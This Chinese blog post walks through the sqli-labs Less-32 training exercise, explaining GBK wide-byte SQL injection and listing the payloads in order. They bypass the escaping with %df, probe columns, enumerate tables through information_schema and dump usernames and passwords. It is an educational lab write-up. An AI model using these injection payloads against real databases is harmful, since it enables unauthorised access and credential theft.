sql-laps less32 双字节注入 解析

已于 2023-07-19 16:54:28 修改
阅读量160 收藏
点赞数
文章标签: sql 数据库 web安全 网络安全
于 2023-04-17 18:41:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73722777/article/details/130205155
版权

打开网页可以看见下面有一行回显,先尝试使网页报错

ea2ffcb548c3451ba6f332805e83ebac.png

 这里可以看见在我们输入的查询语句 ‘ 的前面被添加了一个转义符号使得我们的单引号失效了。

根据关卡名字,我们猜测是双字节注入

双字节注入基本原理:当数据库使用GBK等双字节编码时,我们可以通过在转义符前加上一个特殊字符使得特殊字符的编码(比如%df)加上转义符编码(%5c)从而构成一个全新的字符(%df%5c -> 運)从而使得转义符\失效

于是我们先尝试构造一个id尝试绕过转义符

?id=1%df'

d70fd0502b1d452daf334854a8bc4a05.png

 可以看见网页出现报错,说明我们成功绕过转义符与前面的引号实现闭合

于是我们先查询回显位

?id=1%df%27 order by 4-- qwe

(实践过程中发现+号被过滤,于是采用-- 的方式进行注释)

996ce16eebbf453fbd2e92d933bcafab.png

当order by 3时,页面回显正常。于是推定原select语句查询位点为3

73d0bd5d4fef4edbaa6ba46db7331953.png

构造payload查询输出位

?id=0%df' union select 1,2,3-- qwe

4dcf872816f4411185a05730f4ef5e65.png

 (这里不是很明白为什么id中存在汉字但依然没报错,将1改为0后才会报错使原select语句失效)

判断位点后我们选择3位点进行数据查询,构造payload

查库名

?id=0%df' union select 1,2,database()-- qwe

ad073d8a9d8949208a31ff8eb78974e8.png

查表名

?id=0%df' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1-- qwe

9cf3b6512cf0424b831ab3698c6a1be4.png

 当limit 3,1

da4a6a4a4ba64bfd9884229cb5d55095.png

 查字段

?id=0%df' union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1) limit 0,1-- qwe

(这里使用了一个子查询代替表名,因为所有的单引号都会被转义,于是我们使用套娃子查询绕过单引号的使用)

3635d722961048f6bad96f147aedd76c.png

 熟悉的3个字段

dd142d870b7d41d587985ffc6acf9d58.png

7eab0f06dd5745ea900e2b5827541c9b.png 爆数据

?id=0%df' union select 1,2,concat(username,0x3a,password) from users limit 0,1-- qwe

 fc3eaae72f314dc3a7e5225d17616f9e.png

这里的0x3a是冒号(:)的16进制ascii编码,同样也是为了绕过引号

同理改变limit的数值可以得到其他数据

此题结束。

 

lemofox
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sqli-labs之Less-32和Less-33
→_→
04-30 796
待续。
Less-32字节注入练习
记录笔记
04-11 163
字节: GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节,实际上只有两字节。 宽字节带来的安全问题主要是ASCII字符(一字节)的现象,即将两个ascii字符误认为是一个宽字节字符。 中文、韩文、日文等均存在宽字节,英文默认都是一个字节。 在使用PHP连接MySQL的时候,当设置“set character_set_client = gbk”时会导致一个编码转换的问题。 例子: id= 1’ 处理 1 \’ 进行编码 1%5c%27 带入sql后 id = \’ a
sqli-labs Less 32通关
weixin_64809022的博客
02-20 183
字节注入
sqlilabs less-32~less-37
TA不懒,但还没有添加简介
07-27 289
sqlilabs less-32~less-37
Crackmapexec-LAPS:用于CrackMapExec的LAPS模块
05-23
Crackmapexec-LAPS 用于CrackMapExec的...p CLEAR-TEXT -M圈 技术模块Grazie:根据CME byt3bl33d3r @snowscan @HackAndDo 信用:@ n00py1信用参考: ://www.n00py.io/2020/12/dumping-laps-passwords-from-linux/ 信用
java实战开发1200例源码-laps-mirror:LAPS的镜像源(版本0-57-17)
06-05
这个项目,名为“laps-mirror”,是LAPS(Learning and Applying Programming Skills)的镜像源,包含了从版本0到57,直至17次迭代的所有源代码。这样的资源对于初学者和有经验的开发者来说都是极其宝贵的,因为它...
java实战开发1200例源码-laps:本地分析和预测系统软件树
06-05
- **Git**:"laps-master"表明项目可能使用Git进行版本控制,开发者可以跟踪和协作代码。 - **Maven或Gradle**:构建工具用于自动化构建、依赖管理和项目打包。 7. **开源文化** - 开源软件意味着源码公开,...
SharpLAPS:从LDAP检索LAPS密码
03-04
夏普属性ms-mcs-AdmPwd存储明文LAPS密码。 可以使用execute-assembly在Cobalt Strike会话中execute-assembly此可执行文件。 它将从Active Directory中检索LAPS密码。 要求(两者皆有): 具有ExtendedRight或Generic...
laps-web:一个网站,用于管理对由Microsoft LAPS管理的本地管理员密码的访问
04-28
Lithnet LAPS Web应用程序 Lithnet LAPS Web应用程序是一个IIS应用程序,允许您管理对由管理的 它提供对目录中存储的LAPS密码的细化权限,审核,电子邮件警报和限速访问,并且与OpenID Connect,WS-Federation(ADFS...
sql-laps less34 post类型字节注入 解析
qq_73722777的博客
04-17 95
与get类型不同的是,post传参中的内容不会进行url编码加密,也就是说在输入框中输入的内容不会被自动解码。这种时候我们一般尝试使用抓包来更改传参内容从而做到对转义符的绕过。在方框所在位置hex值为61,所对应的字符为'a',我们将这个61改为df。这时候我们尝试使用抓包来更改数据内容,我们首先构建这样一个payload。在这里我们打开hex,查看网页的16进制编码,然后找到我们的传参内容。然后发现我们输入的内容并没被自动url解码,导致字符绕过失效。于是成功绕过,接下来就是传统的联合注入环节。
sqlilab学习打卡|手工注入|Less32-Less45
spring!
04-03 2964
sqlilab学习打卡|手工注入|Less32-Less45
SQL注入-09】宽字节注入案例—以sqli-labs-less32为例
m0_64378913的博客
05-01 2482
符号 GBK编码 ’ 27
sqli-labs/Less-32
m0_71299382的博客
11-20 310
sqli-labs第三十二关
字节注入---GBK字节绕过
糖小喵
04-21 885
原理 addslashes() 函数返回在预定义字符之前添加反斜杠的字符串 在mysql中,用于转义(即在字符串中的符号前加上”\”)的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。 mysql 在使用 GBK 编码的时候, 会认为两个字符...
字节注入入门详解
爱党人士
05-11 4399
原理: GBK 占用两字节 ASCII占用一字节 PHP中编码为GBK,函数执行添加的是ASCII编码(添加的符号为“\”),MYSQL默认字符集是GBK等宽字节字符集。 大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等), 单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C , 那么现在 %df\’ =%df%5c%27, 如果程序的默认...
字节注入详解
xyx107的博客
08-11 5171
尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型。也有一些cms为了考虑老用户,所以出了gbk和utf-8两个版本。 我们就以gbk字符编码为示范,拉开帷幕。gbk是一种多字符编码,具体定义自行百度。但有一个地方尤其要...
gbk字节注入
左手诗人 右手剑客
06-12 359
<?php //连接数据库部分,注意使用了gbk编码 $conn = mysql_connect('localhost', 'root', 'toor!@#$') or die('bad!'); mysql_query("SET NAMES 'gbk'"); mysql_select_db('test', $conn) OR emMsg("连接数据库失败,未找到您填写的数据库");...
(学习)SQL注入--宽字节注入
Huang921的博客
11-21 3866
SQL注入–宽字节注入实践
如何使用laps 读取密码
最新发布
05-30
LAPS(局域网管理员密码解决方案)是微软提供的一种管理本地管理员密码的解决方案。它可以自动为每个计算机生成一个唯一的本地管理员密码,并将其存储在 Active Directory 中,只有授权的用户才能查看密码。如果您有足够的权限,可以通过以下步骤使用 LAPS 读取密码: 1. 打开 Active Directory 用户和计算机管理控制台(ADUC)。 2. 右键单击您要查找密码的计算机,并选择“属性”。 3. 转到“属性”标签页,然后找到“ms-MCS-AdmPwd”属性。 4. 查看该属性,即可找到该计算机的本地管理员密码。 请注意,使用 LAPS 读取密码需要足够的权限。只有授权的用户才能查看密码。如果您没有足够的权限,请联系您的 IT 管理员。另外,LAPS 可能不适用于所有组织,因此请先了解您的组织是否使用了 LAPS

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值